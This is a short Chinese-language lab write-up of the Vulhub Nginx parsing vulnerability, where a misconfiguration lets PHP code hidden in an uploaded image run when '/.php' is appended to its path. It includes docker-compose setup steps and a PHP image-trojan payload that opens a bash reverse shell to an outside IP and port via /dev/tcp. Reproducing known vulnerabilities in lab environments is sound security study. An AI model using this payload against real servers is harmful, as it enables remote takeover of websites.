该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。[1] 在访问的图片路径后面,添加/.php,一个不存在的php文件,就能执行图片马里面的php代码。 图片马,针对的是网站管理员配置不当,黑客通过一张图片就能拿下一个网站。
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞
docker-compose build //可选docker-compose up -d完成试验后,记得删除漏洞环境哦~~
docker-compose downdocker system prune -a -f //可选简单访问一下,说明Vulhub的Nginx 解析漏洞环境搭建成功了
发现只能上传图片
直接访问:http://144.34.162.13/uploadfiles/nginx.png
再访问一下:http://144.34.162.13/uploadfiles/nginx.png/1.php
下载下来这张图片,然后上传,掏出burpsuite进行重放,修改图片马里面的php代码。
<?php system("bash -c 'bash -i &>/dev/tcp/174.137.58.6/8888 0>&1'");?>再通过burpsuite访问这个图片的路径,尽管504错误,但是
反弹shell成功了
参考^Nginx 解析漏洞复现 https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/